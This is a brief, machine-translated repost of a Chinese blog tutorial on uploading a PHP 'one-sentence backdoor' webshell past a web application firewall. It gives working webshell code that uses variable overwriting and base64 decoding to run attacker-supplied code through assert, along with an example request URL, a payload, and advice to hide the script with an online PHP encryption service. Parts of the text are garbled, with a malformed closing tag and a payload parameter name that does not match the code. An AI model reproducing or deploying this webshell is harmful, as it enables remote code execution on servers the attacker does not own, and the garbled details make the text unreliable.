当前位置:网站首页>Upload script file (one sentence back door) WAF bypass (PHP)

Upload script file (one sentence back door) WAF bypass (PHP)

2022-06-26 04:08:00 Believe in the reason and follow the reason

Variable coverage 、

1. Variable coverage

Script to upload :

<?php
$a = $_GET['x'];
$$a = $_GET['y'];
$b(base64_decode($_POST['z']));
>

phpinfo(); To base64 by :cGhwaW5mbygpOw==
url by :www.xxx.com?x=b&y=assert
Incoming data:
x= cGhwaW5mbygpOw==

2. Encryption obfuscation

Encrypt the script file
Encrypted connection :http://phpjiami.com/phpjiami.html

原网站

版权声明
本文为[Believe in the reason and follow the reason]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/02/202202180539280321.html